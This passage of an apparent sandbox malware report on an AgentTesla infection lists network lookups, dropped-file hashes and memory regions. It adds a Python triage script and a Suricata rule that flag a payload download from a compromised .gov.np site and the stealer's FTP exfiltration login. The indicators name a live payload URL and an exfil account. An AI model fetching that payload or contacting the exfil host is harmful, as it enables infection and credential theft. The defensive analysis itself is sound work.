      2

      DNS Request

      24.144.45.202.in-addr.arpa

      DNS Request

      24.144.45.202.in-addr.arpa

    • 8.8.8.8:53
      122.175.53.84.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      122.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      48.229.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      48.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      136.71.105.51.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      136.71.105.51.in-addr.arpa
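
    Two things in the network section matter for triage. First, the only request attributed to a process is msbuild.exe fetching http://spsc.sudurpashchim.gov.np/geo.bin (239168 bytes, application/octet-stream, over plain HTTP) with a Firefox User-Agent: a .NET build tool presenting itself as a browser to pull a binary from a .gov.np host. Second, the g.bing.com and tse1.mm.bing.net requests carry WindowsShellClient and Edge User-Agents with no process attribution; they are Windows background traffic and do not belong on an indicator list. No FTP session to ftp.vvspijkenisse.nl appears because the injected payload in msbuild.exe crashed (Program crash, WerFault -p 1528), so the FTP account in Malware Config comes from the extracted configuration, not from observed traffic. The Python below is an added example, not Tria.ge output: it scores HTTP records constructed from this section, builds a blocklist from the scored records plus the extracted config, and emits a Suricata rule for the exfil login. The record layout, the score threshold and the list of browser process names are assumptions.

```python
"""Network triage for this report (added example, not sandbox output).  HTTP_RECORDS and
AGENTTESLA_CONFIG are constructed from the Network and Malware Config sections above;
the record layout is an assumption."""
import re
from urllib.parse import urlsplit

# Constructed from the report.  The Bing/msedge requests have no process attribution in
# the report; geo.bin is the one request the report attributes to msbuild.exe.
HTTP_RECORDS = [
    {"process": None, "dst": "204.79.197.200",
     "url": "https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597",
     "ua": "WindowsShellClient/9.0.40929.0 (Windows)",
     "req_headers": {}, "status": 204, "ctype": "", "clen": 0},
    {"process": None, "dst": "204.79.197.200",
     "url": "https://tse1.mm.bing.net/th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041",
     "req_headers": {}, "status": 200, "ctype": "image/jpeg", "clen": 341424},
    {"process": "msbuild.exe", "dst": "202.45.144.24",
     "url": "http://spsc.sudurpashchim.gov.np/geo.bin",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
     "req_headers": {"Cache-Control": "no-cache"}, "status": 200,
     "ctype": "application/octet-stream", "clen": 239168},
]

# Copied from the Malware Config section (password deliberately left out of the IOC set).
AGENTTESLA_CONFIG = {"protocol": "ftp", "host": "ftp.vvspijkenisse.nl", "port": 21,
                     "username": "bringlogsformoney@vvspijkenisse.nl"}

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumption
BROWSER_UA = re.compile(r"^Mozilla/5\.0 .*(Firefox|Chrome|Safari)/", re.IGNORECASE)
BINARY_EXT = (".bin", ".exe", ".dll", ".dat")
SUSPICIOUS_THRESHOLD = 2  # assumption: two independent reasons before a record is flagged


def triage(rec):
    """Reasons a request looks like a payload fetch; an empty list means benign."""
    reasons = []
    u = urlsplit(rec["url"])
    proc = (rec["process"] or "").lower()
    # A non-browser process sending a browser User-Agent is impersonation, not a browser.
    if proc and proc not in BROWSERS and BROWSER_UA.match(rec["ua"]):
        reasons.append("browser-user-agent-from-non-browser:" + proc)
    if rec["ctype"] == "application/octet-stream" or u.path.lower().endswith(BINARY_EXT):
        reasons.append("binary-download")
    if u.scheme == "http" and rec["status"] == 200 and rec["clen"] > 0:
        reasons.append("cleartext-transfer")
    if rec["req_headers"].get("Cache-Control", "").lower() == "no-cache":
        reasons.append("no-cache-request")  # stager forcing a fresh copy of the payload
    return reasons


def payload_fetches(records):
    """(record, reasons) pairs that reach the threshold; background traffic scores zero."""
    out = []
    for r in records:
        reasons = triage(r)
        if len(reasons) >= SUSPICIOUS_THRESHOLD:
            out.append((r, reasons))
    return out


def indicators(records, config):
    """Blocklist-ready indicators: payload hosts/IPs/URLs plus the exfil FTP account."""
    iocs = {"domain": set(), "ip": set(), "url": set(), "ftp_user": set()}
    for rec, _ in payload_fetches(records):
        u = urlsplit(rec["url"])
        iocs["domain"].add(u.hostname)
        iocs["ip"].add(rec["dst"])
        iocs["url"].add(rec["url"])
    iocs["domain"].add(config["host"])
    iocs["ftp_user"].add(config["username"])
    return iocs


def ftp_login_rule(config, sid=1000001):
    """Suricata rule for the exfil account's USER command on the FTP control channel.
    Only tcp/content keywords are used; validate with `suricata -T` before deploying."""
    return (f'alert tcp $HOME_NET any -> $EXTERNAL_NET {config["port"]} '
            f'(msg:"AgentTesla FTP exfil login {config["host"]}"; '
            f'flow:to_server,established; content:"USER {config["username"]}"; '
            f'nocase; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    for rec, reasons in payload_fetches(HTTP_RECORDS):
        print(rec["process"], rec["url"], reasons)
    print(indicators(HTTP_RECORDS, AGENTTESLA_CONFIG))
    print(ftp_login_rule(AGENTTESLA_CONFIG))
```

    The domain list ends up with two entries of different character: spsc.sudurpashchim.gov.np is a compromised legitimate site hosting the stage, so blocking the full URL or the IP is safer than blocking the government domain outright, while ftp.vvspijkenisse.nl is the exfiltration endpoint and can be blocked at the host level. The USER-command rule fires on the first login attempt, before any stolen data leaves the host.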


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini

      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeubztba.53b.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Colorimetric\Indtappende\Hngekjeeffekt\Fradragendes.Att

      Filesize

      306KB

      MD5

      4e478447d9bbee96f0f4363fa03f3646

      SHA1

      ccd297ac9497fda8c12fab076d1871f1241113e8

      SHA256

      3d957ab6b870abeabd8f1c19cb39ed6ca54b6cece2a7d8610826a64c67654fd5

      SHA512

      f1e7db8f2dbc147832c41bb95965cf8d8359b1980a433e9a8325e773d307310538f97349fd0d8ca3658184ea3d46eb5177125117c4b863f490f116938ba71320

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru

      Filesize

      53KB

      MD5

      069fd38747b58c05cc92771b20ff6206

      SHA1

      be3b1d1460ac825103741964b76e1883f59fb8fa

      SHA256

      640d92dda0382f293796ccfc9c51d21da8c24bba7c8c12d8e189c9fdeb4dda64

      SHA512

      1f35e64354054a374215fb5013dcbd3835ae216a999e63736a6aeeb88184cce7c67801be09a9db3f830d50174ccb08d4afc67a21d47f3a889b279d781ba98b57

    • memory/1528-189-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

    • memory/1528-197-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-195-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

    • memory/1528-194-0x0000000022760000-0x0000000022770000-memory.dmp

      Filesize

      64KB

    • memory/1528-192-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-193-0x000000006E800000-0x000000006E840000-memory.dmp

      Filesize

      256KB

    • memory/1528-190-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

    • memory/1528-187-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

    • memory/1528-188-0x00000000776E8000-0x00000000776E9000-memory.dmp

      Filesize

      4KB

    • memory/1528-186-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

    • memory/2428-168-0x00000000062B0000-0x00000000062FC000-memory.dmp

      Filesize

      304KB

    • memory/2428-185-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

    • memory/2428-172-0x00000000064F0000-0x0000000006512000-memory.dmp

      Filesize

      136KB

    • memory/2428-173-0x00000000075B0000-0x0000000007B54000-memory.dmp

      Filesize

      5.6MB

    • memory/2428-150-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

    • memory/2428-149-0x00000000029A0000-0x00000000029D6000-memory.dmp

      Filesize

      216KB

    • memory/2428-151-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-170-0x0000000006F60000-0x0000000006FF6000-memory.dmp

      Filesize

      600KB

    • memory/2428-179-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

    • memory/2428-180-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-182-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-183-0x0000000008860000-0x000000000C5F9000-memory.dmp

      Filesize

      61.6MB

    • memory/2428-184-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-171-0x00000000064A0000-0x00000000064BA000-memory.dmp

      Filesize

      104KB

    • memory/2428-169-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-175-0x00000000081E0000-0x000000000885A000-memory.dmp

      Filesize

      6.5MB

    • memory/2428-167-0x0000000005F70000-0x0000000005F8E000-memory.dmp

      Filesize

      120KB

    • memory/2428-178-0x0000000007470000-0x0000000007474000-memory.dmp

      Filesize

      16KB

    • memory/2428-166-0x0000000005970000-0x0000000005CC4000-memory.dmp

      Filesize

      3.3MB

    • memory/2428-191-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

    • memory/2428-152-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

    • memory/2428-156-0x0000000005900000-0x0000000005966000-memory.dmp

      Filesize

      408KB

    • memory/2428-155-0x0000000005890000-0x00000000058F6000-memory.dmp

      Filesize

      408KB

    • memory/2428-154-0x0000000004F90000-0x0000000004FB2000-memory.dmp

      Filesize

      136KB

    • memory/2428-153-0x0000000005030000-0x0000000005658000-memory.dmp

      Filesize

      6.2MB
